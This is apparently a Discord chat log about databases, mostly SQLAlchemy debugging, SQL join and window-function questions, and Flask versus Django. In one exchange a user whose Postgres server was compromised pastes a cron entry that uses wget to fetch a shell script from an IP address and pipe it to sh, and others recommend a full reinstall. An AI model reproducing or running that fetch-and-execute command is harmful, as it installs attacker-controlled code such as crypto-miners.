cur.close()
return data if data else False
except Error as e:
logging.error(f"Error while executing query: {e}")
cur.close()
return False
You shouldn't catch and throw away errors like that. Much better to let the exception go all the way and crash everything it can and use sentry to keep track of it.
K
i have query about security rules, like if i am applying validation in security rules then what should i write in middlewares?
anyone help?
So how do you properly model a composite primary key and foreign key with SQLalchemy without running into ambiguous relationship error. Are there any examples?
hi guys
idk if anyone else has posted this yet. but its a hacky solution I came up with great
using sql alchemy with sqlite you can't use arrays by default
you can however convert a json array to a string and just store that
😛
Hi guys, I have a weird issue with postgres, where after a while of running it starts to use up all my cpu power on my ubuntu 22 machine
anyone an idea what could cause this?
i havent encountered this issue so i cant be sure, but some online searching suggests that someone could have figured out your database's password and started running malware on it...
I highly doubt this
I have had this issue for a long time
And I have reset my VPS multiple times because of it
Also how are you supposed to run malware on a database @waxen finch
I am also encountering these logs
kdevtmpfsi is a known bitcoin miner malware thing
several sources seem to echo it, although some seem to be caused by vulnerabilities in different programs like redis and apache
docker-library/postgres#798
https://dba.stackexchange.com/q/294351
https://stackoverflow.com/a/66222562
https://medium.anands.me/kdevtmpfsi-using-100-of-cpu-here-is-how-you-can-fix-that-89c247a24442
But does this mean someone guessed my pw to my VPS?
Or is it only my db?
I did not get any output from these commands
in my cronjobs I did find the following cronjob tho:
* * * * * wget -q -O - http://185.122.204.197/pg.sh | sh > /dev/null 2>&1
Idk if this is normal?
I dont know that ip address
@waxen finch @thorny anchor
probably not. could also ask in #cybersecurity maybe?
yo guys, I made a new table in my database, but I cant seem to find the table even though pythonkeeps telling me the table already exists
im using pycharm community, and they recommended some extension to view diff tables
so the table exists in the database but pycharm doesn't list it? might be better asked in #editors-ides, but can you show a screenshot of the IDE? also, did you create the table after opening it in pycharm? if so, did you try reloading it to see if the table list gets updated?
I just had to close it and reopen the database tab emoji_sighs
the refresh button only works for updating that specific table, but if you made another table, you need to close and reopen the tab basically
huh, that seems a bit awkward for a refresh button
think the refresh button refreshes that specific table only
does that mean it'll refresh the entire schema if you select main?
oh, i thought it would look like the video on pycharm's site https://youtu.be/Qw_JniULJBI
Working with SQLite databases is easier than you think! In this video, you’ll see how you can skip messing around with the command line and connect to your database just by dragging and dropping. You’ll also find out all of the great functionality our IDEs have for working with SQLite databases, including code completion and inspections for SQL,...
oh damn, now I wanna know how to get it to do that
invoice_item = Table(
"invoice_item",
metadata_obj,
Column("item_id", Integer, primary_key=True),
Column("item_name", String(60), nullable=False),
Column("invoice_id", Integer, nullable=False),
Column("ref_num", Integer, nullable=False),
ForeignKeyConstraint(
["invoice_id", "ref_num"], ["invoice.invoice_id", "invoice.ref_num"]
),
)```
Thanks, I forgot to mention I got it already 🙂
ah nice
But appreciate the answer - it's basically what I did yes
hey guys one question in sql when i have to create a function
whats the difference between return and returns
received_friends = (select(Friends)
.where(Friends.receiver == current_user_username)
.options(joinedload(Friends.sender_user)))
sent_friends = (select(Friends)
.where(Friends.sender == current_user_username)
.options(joinedload(Friends.receiver_user)))
friends = await db.execute(received_friends.union(sent_friends))
print(friends.scalars().first())``` I'm trying to run this query but I'm getting a string as a result of my query instead of a Friends model. Does anyone know what the issue could be?
returns is like a type checker for the return value of the function
sql is a static typing language
You can't store or receive a Python model from a database. You'll have to instantiate it from the data
Anyone here have experience with SQL Alchemy signals that could help me out? I have been trying to get it to simply print out some message when I insert a record but I am having no luck. I've posted in help if interested. Thanks.
If you provide the code, I could maybe help you.
I just posted again in help. #1247232695637905408
What is the best practice, to use JOINS (left/inner/right/etc) or not use that JOINS and get data using filtering on where?
Use filtering on where
@wise wind just curious, why using filtering on where is best than to use joins?
Joins are good for grouping different tables together based on a certain relationship with each other. I just like to filter in the where because it's easier for me to read.
Yes, I agree about to be easier to read. In the past (many many years ago) I was always used filtering in WHERE, never used joins, but now that I'm back do database applications I see that many people (mostly?) are using joins...
Joins such as inner joins are good for filtering out tables that don't have the relationship you stated (on clause) with the remote table.
You'll have to give an example. If you can accomplish the query without a join (or subquery) you wouldn't use a join.
this is absolutely, definitely not normal. i wouldn't follow "find and delete" to get rid of it, you should reinstall from scratch and import a database dump after changing all your passwords to something more secure. you should also review the database dump for anything suspicious (like superusers, pg_cron background jobs, etc)
Understood. I have no examples yet. I'm talking about general use, where I see people using "join", but that same thing I can see that can be done using filtering on where. So I was curious what is the best and/or have better performance.
"I see people using "join", but that same thing I can see that can be done using filtering on where": I'd be curious where you've seen this. I suspect you're just seeing how some people move the "on" conditions into a where clause/etc, but it's still a join.
I noticed that whenever I print:
print(friends.all())
print(friends.all())```
First result I get a list with some models.
Second result I get an empty list.
Anyone know why?
They are functionally equivalent, it's just two different ways of writing the same thing. The first type is called an ANSI join. This is what I prefer, it's unambiguous and clear. The second is an implicit join.... i don't like it, but the db interprets them the same. There's some caveats, like snowflake doesn't apply certain transformations with non ansi joins
isn't the second one a cross join?
We're talking about the query syntax, not the actual query itself
oh I was just curious
Explicit 'join' vs implicit
Is the implicit one a cross join?
But it's not a Cartesian product because of the where clause
oh ok thanks
Basically, both of those are equivalent and databases will (afaik) generate the same plan for both
Answered in pydis, use a group by if you just want a count. Or, if you just want laptops, then select count(*) from table where device_type='laptop'
Window functions are advanced sql, you should master aggregates (group by) first, imo
There are two laptops, and three non laptops
You partitioned by device_type=laptop, not device_type
yes billy. I am partitioning by device_type=laptop. So, the partition window looks like below, right?
No, for row 1, the window is the three non laptops since it's a non laptop
even in that case, for second row, it should be 2 right? but 3 is the output for second row..
You're only showing the count. Add * to the select.
Row order is generally non deterministic without an order clause
Regardless, a window function is -not- what you should be using for the original question
sorry, not getting these 2 lines. what is the relation between addding *, row order?
You're guessing which lines relate to which count.
Write a query that returns all columns and the count
guys can one help me I cannot connect my database potgresql to python I get IndexError
Thanks. I don't know why, but I prefer the second. Maybe because I start a long time ago with sql without use o joins. But what can't be write in SQL if not use ansi joins?
If you send the code, I can maybe help.
ok I will send you
def near_station (self,position ) :
lat , longt = position
connection_string = 'postgresql+psycopg2://ppd:2004@localhost:5432/new'
with db.create_engine(connection_string,pool_pre_ping=True).connect() as con:
con.execute("SELECT * FROM datacamp")
return Station("de",12) # station Station (...)
I ve imported SqlAlchemy
where did you get the Station callable?
Its a class I've write it
Could I see more of the code? This is not enough context.
ok
You can write both ways, but the ansi join is clearer with complex queries
import math
import sqlalchemy as db
class Station :
def __init__ (self,nom,position) :
self.nom = nom
self.position = position
def distance_between_position(self,my_pos):
lat1, lon1 = my_pos
lat2, lon2 = self.position
R = 6371 # Rayon de la Terre en kilomètres
dLat = math.radians(lat2 - lat1)
dLon = math.radians(lon2 - lon1)
a = math.sin(dLat / 2) * math.sin(dLat / 2) + \
math.cos(math.radians(lat1)) * math.cos(math.radians(lat2)) * \
math.sin(dLon / 2) * math.sin(dLon / 2)
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
return abs(round(R * c * 1000)) # Distance en mètres
class DataBaseStation :
def near_station (self,position ) :
lat , longt = position
connection_string = 'postgresql+psycopg2://ppd:2004@localhost:5432/new'
with db.create_engine(connection_string,pool_pre_ping=True).connect() as con:
con.execute("SELECT * FROM datacamp")
return Station("de",12) # station Station (...)
ds = DataBaseStation()
ds.near_station((2,3))
def checkPosition () :
connection = 2 #we check the connection from gps through method
if connection == None :
#send request to the driver in the case to update manually the station .
return -1 # Don't do tracking anymore .
else :
return # position from the gps
def track () :
pos = checkPosition () # check if the position can get
if pos != -1 :
ds = DataBaseStation()
near_station = ds.near_station()
while True: # to indicate that this operatin is repeated
distance = near_station.distance_between_position(pos)
if ( distance > 100 ) :
print(f" next station is {near_station.name}")
elif( distance < 50 ) :
print(f"We'll be arriving soon at station {near_station.name}")
elif ( distance < 25 ) :
print(f" we are in station {near_station.name}")
could I see the exact error?
like the full exception
sqlalchemy.exc.OperationalError: (psycopg2.OperationalError)
(Background on this error at: https://sqlalche.me/e/20/e3q8)
Is that all?
Hi,
could anyone pls explain this..
Hi,
when i tried below query for the problem https://datalemur.com/questions/laptop-mobile-viewership
SELECT
COUNT(*) OVER(PARTITION BY device_type='laptop') as laptop_views
FROM viewership
The output is:
laptop_views
3
3
3
2
2
But, as per my understanding about the OVER & PARTITION BY clauses,
When i PARTITION BY device_type='laptop', then COUNT() gets applied on the table which is present inside the red colur box. So, output should be single row with value of 2, somewhere i am going wrong...
https://ctrl.vi/i/i7OXFOO8O
What you're using is called a window function which doesn't group all the rows together so you won't get one row.
I explained all of this already? #databases message
If still not clear, run this query ```python
SELECT ,
COUNT() OVER(PARTITION BY device_type='laptop') as laptop_views
FROM viewership
The partition by clause gives a different result to columns with a different device_type for your scenario. The result being the count of rows of the device type of the column.
question here
if I want to learn database, should I start with MS Access?
or start right into MySQL?
imo SQLite then PostgreSQL
I wouldn't bother with MS Access unless you really, really, really need of it
start with MySQL
as a hobbyist, https://sqlbolt.com/ and https://sqlite.org/index.html were my main sources of knowledge about relational databases
given that SQLite is file-based and built into python's stdlib, it's trivial to setup and gives you a lower barrier to entry for using SQL in your own applications
There's also a fun quest here: https://mystery.knightlab.com/
anyone can help me with an sql query? I have been trying to solve with chatgpt for days
I have the following table:
CREATE TABLE IF NOT EXISTS polymarket_transfers_full (
id SERIAL PRIMARY KEY,
type VARCHAR(255),
token_address VARCHAR(255),
sender VARCHAR(255),
receiver VARCHAR(255),
token_id VARCHAR(255),
transfer_event VARCHAR(255),
value NUMERIC(20, 0),
contract_address VARCHAR(255),
transaction_hash VARCHAR(255),
block_number INT,
timestamp BIGINT
);
and it contains all transfers of tokens between addresses for every transaction that has been made
how one transaction looks like is this:
and received 1109660000 tokens with id '48549020894180052638694281078561063233074907538074431452668232191323199827633' for this```
and the same with
and received 1109660000 tokens with id '86872740570934444235116129614074633150170172533953273931299675806736964134675' for this```
Now I want to make a query to populate a table called transactions:
CREATE TABLE IF NOT EXISTS transactions (
transaction_hash VARCHAR(255) PRIMARY KEY,
erc20_volume_exchanged NUMERIC(20, 0),
erc115_volume_exchanged NUMERIC(20, 0),
erc115_token_ids_exchanged VARCHAR(255)[],
proxy_wallet VARCHAR(255),
direction_of_exchange VARCHAR(255)
);
that will within each transaction_hash look for where address '0x4bfb41d5b3570defd03c39a9a4d8de6bd8b8982e' is the receiver of money and sent any tokens to anyone
Hi, I'm using PostgreSQL by NeonTech. I code in Python v3.11.3. I have my discord bot. I am using Patreon to receive my payments and manage my memberships. So, Patreon has an API to get all the list of Memberships. My current User Premium table is:
userpremium(user_id, tier, expire, payment, id, state, prime_count, used)```
The `state` column can have values `expired` (expired plan), `current` (currently running plan), `pending` (plan will start in future)
But Patreon provides some extra information such as `full_name`, `last_charge_status`, `currently_entitled_amount_cents`, `patron_status`, `patreon_id`. So should I make a new table specially for Patreon users? or change my current one?
I would have nullable columns
can you explain?
I also give premium to my users using a command.
Do you mean that the columns can be null and whenever I am giving premium using command or something like that so I won't pass the full_name and all?
one table, if the row doesn't have a patron_id or whatever then it's null
ok.
I already have my table where id is auto increment I want to make another column with name patreon_id which will be primary key but i can't
how do i make
Don't. That's totally wrong. You can make an index on it if you like though.
wdym
Do you understand any of the words?
the id column is bigint with auto increment
I understand that it is wrong but what do you mean by make an index.....etc
That's fine. But your idea of having multiple primary keys is wrong.
uh
Do you know what an index is? Again: if you don't understand a term SAY SO
i don't know
i think a numbering somthing?
numbering a list?
SAY SO. Always always ask about terms if you don't understand them. Otherwise it's just chaos.
okay.
Not in database talk no. It's a thing used to find rows fast.
how?
That's not really relevant. You only need to know that it does.
okay but how do I logic it then?
"INSERT INTO patrons (full_name, last_charge_status, patron_status, entitled_pay, tier, user_id, patron_id) VALUES ($1, $2, $3, $4, $5, $6, $7) ON CONFLICT (patron_id) DO UPDATE SET full_name=$1, last_charge_status=$2, patron_status=$3, entitled_pay=$4, tier=$5, user_id=$6 WHERE patron_id=$7"```
this is my sql for patreon
i am changing it and shifting to userpremium table and I will add all these columns there
So my current column is:
userpremium(user_id BIGINT, tier BIGINT, expire BIGINT NOT NULL, id AUTO INCREMENT PRIMARY KEY, state TEXT, prime_count BIGINT, used BIGINT, full_name TEXT, last_charge_status TEXT, patron_status TEXT, entitled_pay TEXT)```
If you don't listen to advice, why ask for it?
you just said to keep 1 table and I keeping it?
Ah. My bad. Your table names are confusing :)
yeah lil bit
"Users" would be better imo
k but that doesn't matter ig
names matter enormously. In fact, names are maybe the most important thing in programming.
okay
Mongodb
@shut tiger If I cannot make 2 primary keys then do I need to do it manually?
I mean program logic
then I will need to make 2 sql queries
Should I have done this with a database:
temporal_df = refined_df.group_by_dynamic(
index_column="created_datetime", every="1h", closed="left"
).agg(
[pl.col(column).sum() for column in refined_df.columns if refined_df[column].dtype in numeric_types]
)
temporal_df = temporal_df.upsample(time_column="created_datetime", every="1h").fill_null(0)
Just to avoid that line? Probably not.
That line is just the highlighted part of all that
The purpose of a database is basically storage and retrieval. Do you have a problem there?
Not really
You should read the wikipedia page for primary key or something.
ok
Is this the place to talk MySQL?
yes
There's no "better" in the abstract but you can find plenty of comparison summaries. https://www.integrate.io/blog/postgresql-vs-mysql-which-one-is-better-for-your-use-case/
For most use cases it probably makes no difference. Go with what you know or flip a coin. 🪙
Hehe i thought so
Both feels exactly the same
Anyways Ill see if i could find anything worthy from this page
Postgres upgrades are really bad and replication too. I use postgres now because of all the cool features and the hype. I regret it.
If you need any of the features of postgres though then you should pick it.
I've using MongoDB for a while and I liked it so far.
Mongo is a bad option for almost everyone
Why is that @shut tiger
plus there is no async driver for MongoDB on Python
(Motor uses threads to provide an async interface)
@alpine dirge you'll be hard pressed to find anything MySQL does better than PostgreSQL, and there are boatloads of stuff that PostgreSQL does better. That is my opinion as someone who has used both extensively,
MySQL is chronically lagging behind in SQL standards support, in fact SQLite has more or less overtaken MySQL already
please help
not related to #databases, you want #data-science-and-ml. (But also, just use %pip instead of !pip; you're probably installing into some other installation.)
Depends.
I'd say I'd use PostgreSQL, though setting it up can be difficult at first.
worked somewhat ty
also needed to activate my environment
But as its nosql dont you get any issues while fetching specific data?
Exactly i was having the same opinion which is why i thought to get it confirmed
Tbh if i go long in the project itll become very difficult to switch which is why i was planning on finding optimal one. Postgress after reading docs and all seems little complex than mysql
I need some help with these error coding
Course_Project_Phase_4_of_week_9.py
Im lost
last 2 weks of class
You should show people the real crash if there is one. That looks like warnings.. You should also not send pixels, that's very hard to read.
Anyway, the problem is that EmpTotals looks like you want it to be a global variable, but you defined it at the bottom inside if __name__.
There are many more issues though.. like userpwd = GetUserPassword which should be userpwd = GetUserPassword(). You seem to have written a lot of code without running it... that's a mistake.
How do people generally handle databases when it comes to frameworks like flask? Is there any examples or resources I can look at?
imo it's a bit much calling flask a framework, it's just a tiny lib to wrap http handling. Anyway, normally people use SQLAlchemy with flask. In Django you normally use the Django ORM (although you can use SQLAlchemy there too if you're a bit crazy).
I remember you from the django server lol.
I have an idea for a project but I'm trying to work it microservices instead of a monolithic architecture. I'm worried if I use django that may be a lot more difficult?
I mean.. using microservices is making your life miserable for no reason in the first place so... but no, it's not a big difference between flask and django.
If you don't have 100 developers, don't use microservices.
It's not something i'm ever going to release, most likely i'll just build it for the sake of learning and take it down
Still.. seems like there must be a million things more useful to learn than microservices.
This is just what I find interesting right now,
is SQLAlchemy similar to libraries like asyncpg?
no, it's an ORM
asyncpg, psycopg and alike are just database connectors or drivers
SQLAlchemy is an Object Relation Mapper that can use multiple different connectors as its backend, and provides a class based interface that abstract away the SQL
Would I be using SQLAlchemy stand alone, or with a database driver library?
it literally doesn't works stand alone, it requires a driver to work
Ah okay
it is an abstraction layer between your code and the database connection, it does not handles the internals of the connection itself
How would I keep track of my databases performance? What is the main information I should be looking at?
it depends
for most cases I'd guess latency and index coverage might be the most important factors though
Microservices and vague performance questions.. hm. do you have an actual project?
I get the feeling you're putting the cart before the horse
I havent started anything if that's what your asking, I'm just trying to figure out how to deal with a database correctly
I don't think I am
is index coverage similar to hashing?
I meant how much % of your queries are covered by your indexes
If you have never created an API that interacts with a database before, then I'd agree that yes you are
You can worry about performance after you understand how the system works
The order is: make it work, make it right, make it fast.
Your order from what I gathered this far is: make it like netflix, measure it, something else
:P
Not at all? If I want to understand how these things work I need to actually learn about them no?
What things though? That's the key.
database performance, and using the database correctly, those are the questions I've asked.
I've built multiple projects with databases before but I don't feel like I've ever used them correctly
Thats why I'm asking
Why do you think that?
performance considerations and the "correct" way to do things all depends on what your project's real bottlenecks or limitations are
There are lots of lists you can look at like this one for ideas. But ultimately which ones you care about and which you don't is entirely situational and dependent on your use case. https://www.metisdata.io/blog/database-monitoring-metrics-key-indicators-for-performance-analysis
Yea, which is why I asked "why do you think that?"
They've all been in a single huge file because I was just trying to build them as quickly as possible, that's why I'm asking how I would structure a project to do with databases
That sounds like a code style thing, not a db performance thing.
That was my first question
Also, nothing wrong with that imo :P
Was your app itself performing adequately? Were you spending more than expected for database resources?
You can over-optimize to an unlimited extent if you don't stay focused on what you actually have reason to care about
And making microservices out of your app is a great way to make the performance worse, the maintainability a horror, etc.
Like I said above, I'm building a project with them so I can learn how they work, It's not something thats going to be used by anyone
...but why?
I'm not looking to over optimize, I'm trying to figure out how I'd track the performance
just because of the hype? Because then I would recommend you to ignore the hype :P
what hype
tracking performance is 100x harder with microservices btw :P
What
Of your database(s), or of your micro services in general?
What database engine?
The database specifically, postgres
I don't want to fall into the over optimization trap but I want to know how I would track the performance in the first place
To start I would focus on the app performance in general and only dive into that if you suspect a problem.
That said, https://www.postgresql.org/docs/current/monitoring.html
Thank you :)
are you saying flask is a trend lol
pretty much. People are like "ooh, so few lines" and that's true.. because it doesn't do much 🤷♂️
I've literally only ever heard of django, flask and fastapi
People who use "light weight" as an argument for flask over django, but at the same time.. using python... with probably the most gigantic standard library of any language. It's just funny to me. The extra lines of code in Django are a measurement error.
Also, lines of code on disk is irrelevant in the first place anyway.
do people mean "lines of code" when they say "light weight"?
I'm using flask because django has features that I don't need, whereas flask doesnt...
🤷♂️ I don't think most people know what it means when they say it. I think they just repeat it like a religous doctrine.
see? that's nonsense right there
How so
What's problem with having features you don't need this second?
You're saying I will need them down the road?
I am asking a question :P
(I'm big into the Socratic method)
Personally I reach for Django first because I find the ORM so much easier to work with than SQLAlchemy+Alembic.
I put off learning Django because it seemed so much more complicated, but in the end it's really not
One of the main reasons I'm using flask is because I want to learn how I'd structure and build a project without the built in orm
imo the problem with django isn't that it has too many features, it's that it has too few.. which is why we wrote iommi :P
the ORM doesn't affect the structure significantly...
I don't know that because i've never built one
Hence why i'm here
I don't see why i'd use django when I could use something thats much easier to get going with, especially when all of the features django offers, I'm not going to use
but yea, you will btw, and if you don't, the features being there doesn't matter. Again, you're using Python. Every install ships with enormous amounts of features/code you never use.
Are you putting SQL in your Python instead of using an ORM? That gets messy fast and is probably the wrong choice unless you have a very good reason
It's not really easier to get going with flask... that's just more rumors.
Thats what I was doing in the past yes, it looks horrible which is why I came here to see how I should do it properly
well it's not, flasks boilerplate code is like 5 lines wheras Django has a bunch of files that I realistically will never need
I want to sturcture the program myself
I mean.. the generated manage.py and settings.py has some stuff in it, but if you don't look in there it's the same ~5 lines.
And all of the other files that creates unneeded complexity
If you've never touched an ORM, it's 100% worth learning,. regardless of if you stick with Flask or not
I get it. I felt that way once. But if you try actually building a few things with Django enough to get the hang of it, I expect you may feel differently
Are you guys saying I just shouldnt use flask
I should write a blog post showing how the minimal django app is just as simple as a simple flask app...
The only tutorials I've ever seen with django are way more complex than those that use flask, maybe thats why I feel this way
aka django documentation
I am. I don't think flask has a useful nisch. FlaskAPI had a point... well.. before django-ninja, now that also has not much use...
Sure. It also does more. Much much more. If you just do 1/5th of the django tutorial it does the same as the flask tutorial :P
If your purpose is learning (not simply getting something done that you already know) and you've completed at least one project with Flask already, then yes.
If you learn Django reasonably well and still have reasons to prefer Flask, I won't argue with that (but Boxed might 🤣)
sounds good
Not at all. MongoDB Aggregation works really nice. https://learn.mongodb.com/learn/course/mongodb-aggregation/lesson-1-introduction-to-mongodb-aggregation/learn
Discover our MongoDB Database Management courses and begin improving your CV with MongoDB certificates. Start training with MongoDB University for free today.
That's not the issue. It's the schema-lessness and no referential integrity that will kill you.
Exactly that’s what i was concerned.. @spare lagoon
Good evening, does anyone have any suggestions for optimizing this query?
I need each query to return only 1 document...
async def get_cards_by_over(
self, ignore_cards_id: list[str], *overs: int
) -> list[Card]:
cards: list[Card] = []
for over in overs:
card = await self.repository.get_model_by(
{
"id": {"$nin": ignore_cards_id},
"stats.over": over,
}
)
if card:
cards.append(card)
return cards
async def get_cards_by_over(
self, ignore_cards_id: list[str], *overs: int
) -> list[Card]:
cards: list[Card] = []
cards = await self.repository.get_model_by(
{
"id": {"$nin": ignore_cards_id},
"stats.over": {"$in": overs},
}
)
return cards
you could try this should reduce the no. of queries by a lot most of the time is lost due to network latency in urs, after u get the cards list feel free to filter out to like 1 card per over ig
please let me know when you do!
What do you guys use for designing database schemas? Any special tooling or just pen and paper?
I just write my (django) models in python code. 99% of the case it's trivial and you don't need to think about it much. At least I don't..
My approach as well but I have a feeling it will get more and more and more convoluted so I need o have some sort of docs
Docs?
I wish to store some plain text in repo when opened in some tool display diagrams and stuff like that 
I mean.. generating a graph from the models is a thing. There are tools for that.
I wouldn't store it in plain text unless you have tests to make sure the text file is correct.
I would store it in the repo in plain text because devs are lazy af. I was hoping such tool exists that would let me design and aslo serve as a doc and be plain text. Google aint helping :/ I am guessing I ask for too much
You can write your own tooling to make the unit tests check that the doc is up to date
This didn't cross my mind, good thanks.
Writing shitty parsers is my specialty :P
You should see the tooling I built to do docs in iommi.. it's honestly a bit bonkers. We write our docs in pytest and mark what code to exclude from the tests, and what text to include, and what code to produce html snippets that gets included in the finished docs as iframes (instead of screenshots)
bwoah 😲 . I am just gonna make devs update docs before matching that in code, not sure if this will backfire
You just said "I would store it in the repo in plain text because devs are lazy af" and now you will rely on them being super non-lazy and careful and never forget to update it? 🤣
i know i know, I want to have it but I am lazy as well lmaoes
You can probably find a package to produce ascii graphs
It just needs to be very easy to use, I guess I should keep on searching
It's not hard to write...
you might be confused as to what I am seeking but imagine working with devs that hate to type and read
I was talking about you writing it
myself included
I am at the low point now fr, but meds are kicking in
asciidoc is great
There are database specific tools out there too. What db?
First of all, wrong channel. Secondly it's a bad idea to publicly declare you are ddos;ing a federal site 🤣
@wooden topaz #python-discussion message The reason is: You have a mix of aggregate and non-aggregate fields in your select. "select x, sum(y) from table" is invalid because x is neither in a group by nor is it an aggregate function.
got it. thx..
postgres
Exactly what I was looking for 😍 thnaks
I'm getting sqlalchemy.exc.MissingGreenlet: greenlet_spawn has not been called; can't call await_only() here. Was IO attempted in an unexpected place? (Background on this error at: https://sqlalche.me/e/20/xd2s) whenever I'm trying to refresh the expired model
The documentation that links to says:
When using the ORM this is nearly always due to the use of lazy loading, which is not directly supported under asyncio without additional steps and/or alternate loader patterns in order to use successfully.
We haven't seen your code so it's hard to say more than that.
I fixed the issue.
I just put expire_on_commit = False when defining my Session.
can someone please help me with something? im tryna do this job sim and the first step is to paste "npx create-react-app@3.4.1 my-app --scripts-version=@skyscanner/backpack-react-scripts --template @skyscanner/backpack --use-npm"
into the terminal
but what terminal? there was no bg info
not python related btw, but this is the only resource i had
Here is my db. I am using flask sqlalchemy.
https://paste.pythondiscord.com/36QQ
I am updating my database by using this tutorial. They also have a new way to query/select.
https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-iv-database
Can I use the second link to query/select instead of the first link?
https://flask-sqlalchemy.palletsprojects.com/en/3.1.x/queries/#select
I tried adding using uselist=False to the relationships column in both many tables but I get the same error.
posts = db.session.scalars(db.select(Posts)).all() is triggering the error.
@main.route("/")
@main.route("/home")
def home():
posts = db.session.scalars(db.select(Posts)).all()
return render_template('home.html', posts=posts, title='home')
Summary of the error.
InvalidRequestError
sqlalchemy.exc.InvalidRequestError: On relationship Posts.rel_user, 'dynamic' loaders cannot be used with many-to-one/one-to-one relationships and/or uselist=False.
Here is the full error.
https://paste.pythondiscord.com/LYWQ
Any idea how to fix this? Thank you in advance. Please ping on reply.
What does the model configuration look like?
@wise wind Do you mean the db I linked it above. Here it is again https://paste.pythondiscord.com/36QQ . It has the columns etc
I assume your using a dynamic loader to load your relationships. It seems like sqlalchemy doesn't let you load anything that is not a collection dynamically in sqlalchemy. It makes sense because dynamic relationships let you query your relationship even further but that wouldn't make sense because your relationship is only returning one object. I would add the parameter lazy ="selectin" to your relationship configuration to change the loader.
@wise wind all the relationship columns?
Okay I will try it thanks what about uselist=False?
It makes things a lot more simpler because the relationship will return model objects instead of a query.
It's already uselist=False by your config.
For example:
rel_user: so.WriteOnlyMapped['User'] = so.relationship(back_populates='rel_posts')
you don't have a list wrapped around 'User' meaning it will only return one User object
rel_user: so.WriteOnlyMapped[List['User'] = so.relationship(back_populates='rel_posts')
This will return a list of Users but wouldn't make sense for you because a Post does not have many users for your scenario.
So the solution is to add lazy ="selection" @wise wind
lazy ="selectin"
@main.route("/")
@main.route("/home")
def home():
posts = db.session.scalars(db.select(Posts)).all()
return render_template('home.html', posts=posts, title='home') ``` Is this all your code?
because it's kind of weird if you got that error if that's all you did
there is a lot more code but this is error
Could I see how you queried the objects?
do you mean posts = db.session.scalars(db.select(Posts)).all()
like did you access the relationship attribute after that?
like [post.rel_user for post in posts]?
Here is a little more then what you asked.
{% extends "layout.html" %}
<!-- title is flashblog -->
{% block title %} {{title}} {% endblock title %}
{% block post_info %}
{% if posts %}
{% for post in posts %}
<!-- The line url_for... is = to ("/post/<int:post_id>") in routes.py-->
<!-- why do I need post_id = post.id'?, Because I am looping to get the post.id's -->
<h2> <a href="{{ url_for ('postinfo.post', post_id = post.id) }}"> {{post.title}} </a> </h2>
{% endfor %}
{% endif %}
{% endblock post_info %}
Did the code end up working?
Oh sorry I got a phone call let me test it I was distracted
@wise wind I am still getting the error
What's the error?
The same
InvalidRequestError
sqlalchemy.exc.InvalidRequestError: On relationship Posts.rel_user, 'dynamic' loaders cannot be used with many-to-one/one-to-one relationships and/or uselist=False.```
...
One thing I want to mention
I have some code from the old database but I commented all the code with hash tags
howd you define your db variable?
brb
all good
Here is config.py https://paste.pythondiscord.com/CLXA and init.py https://paste.pythondiscord.com/OGCQ
(I am using windows)
I run the code by going
$env:FLASK_ENV='dev'
$env:FLASK_DEBUG='True'
flask run
Then I have a file called app.py
Let me show it
from app import create_app
app = create_app()
is sqlalchemy up to date for you?
let me check
Here is a little more info then you want
alembic 1.13.1
argon2-cffi 23.1.0
argon2-cffi-bindings 21.2.0
blinker 1.8.2
certifi 2024.2.2
cffi 1.16.0
charset-normalizer 3.3.2
click 8.1.7
colorama 0.4.6
Flask 3.0.3
Flask-CKEditor 0.5.1
Flask-Login 0.6.3
Flask-Mail 0.9.1
Flask-Migrate 4.0.7
Flask-Moment 1.0.6
Flask-SQLAlchemy 3.1.1
Flask-WTF 1.2.1
greenlet 3.0.3
idna 3.7
itsdangerous 2.2.0
Jinja2 3.1.4
Mako 1.3.3
MarkupSafe 2.1.5
packaging 24.0
pip 24.0
pycparser 2.22
redmail 0.6.0
requests 2.32.2
SQLAlchemy 2.0.30
stripe 9.7.0
typing_extensions 4.11.0
urllib3 2.2.1
Werkzeug 2.3.0
WTForms 3.1.2
Yep it certainly looks like it
:) ?? please can anyone guide me
im so new to all of this, i wud really appreciate help
@ionic goblet If you are in a rush you could ask on the help channel also what ide are you using
command prompt
or the terminal in VS code
Go in the directory of the React application first.
@obsidian basin It's kind of weird because the loading error should occur when you're trying to access the relationship attribute.
@wise wind Thanks for attempting any advice?
For the relationship configuration do Mapped instead of WriteOnlyMapped because WriteOnlyMapped works only for collections.
Okay I will try should I get back to you if it doesn't work or are you all out of ideas
It's got to be the solution.
wdym?
all good
@wise wind it worked! Thanks a ton.
Any reason why miguel gringberg's tutorial showed so.WriteOnlyMapped ? No rush on a response
It looks like he used so.Mapped for some of the columns.
I know but for the relationship columns he used so.WriteOnlyMapped
oh he just used it for the rel in table
It's a relationship loading strategy that is meant for large collections with thousands to millions of rows. It basically loads all the rows in the relationship without loading all the rows in memory. You got that error because the write only relationship strategy is meant only for collections and not single objects.
@wise wind Again thank you for all the help.
No problem. Remember that with lazy loading your relationship attribute (sqlalchemy_model.relationship) is not initialized until you call it. Lazy loading is not a good way to load relationships because you have to query the object and call the relationship attribute which are two separate network requests which causes more latency.
Also, make sure to configure these relationships as: rel_posts: so.WriteOnlyMapped[List['Posts']] = so.relationship(back_populates='rel_user') rel_payments: so.WriteOnlyMapped[List['Payments']] = so.relationship(back_populates='rel_user') because a user can have many posts and payments.
@wise wind I was just doing that but thank you again
How do you know so much about databases I know how to design them a little bit but known of these lazy loading details, if you are busy feel free to respond when you want to
I dmed you but if you want to talk here just let me know.
Respectfully whats an ide
Programmers use something called an IDE (integrated development environment) to write their programs. It's just a text editor, like Word or Notes or whatever. The reason why we don't use word is because IDE’s have features that help you write faster and better code. For examples it has something called auto completion.Most IDEs know the language...
=D im sorry but that just flew over my head
Feel like i shud have learned more basics before starting...
What are you trying to do?
Oooh okie so i dont think i havr an ide...
Hi
Okie so "can someone please help me with something? im tryna do this job sim and the first step is to paste "npx create-react-app@3.4.1 my-app --scripts-version=@skyscanner/backpack-react-scripts --template @skyscanner/backpack --use-npm"
into the terminal
but what terminal? there was no bg info"
What is a job sim?
Whrn i paste it into cmd of my windows laptop i get nothing
Job simulation, lemme send u the deets one sec
So it is for job training? Is it a coding job?
Yeap
In this task, you’ll be using the Backpack library to build a simple web application. The application you build will be a simple page for picking a date. Since Skyscanner helps people to research and book travel reservations, this is a functionality that gets a lot of use! The application you create will include the header text “Reservation Date,” a calendar, and a “continue” button.
Set up and customise your React application
Test your application
This task includes three stages:
setting up your workspace,
customising your application, and
executing automated tests.
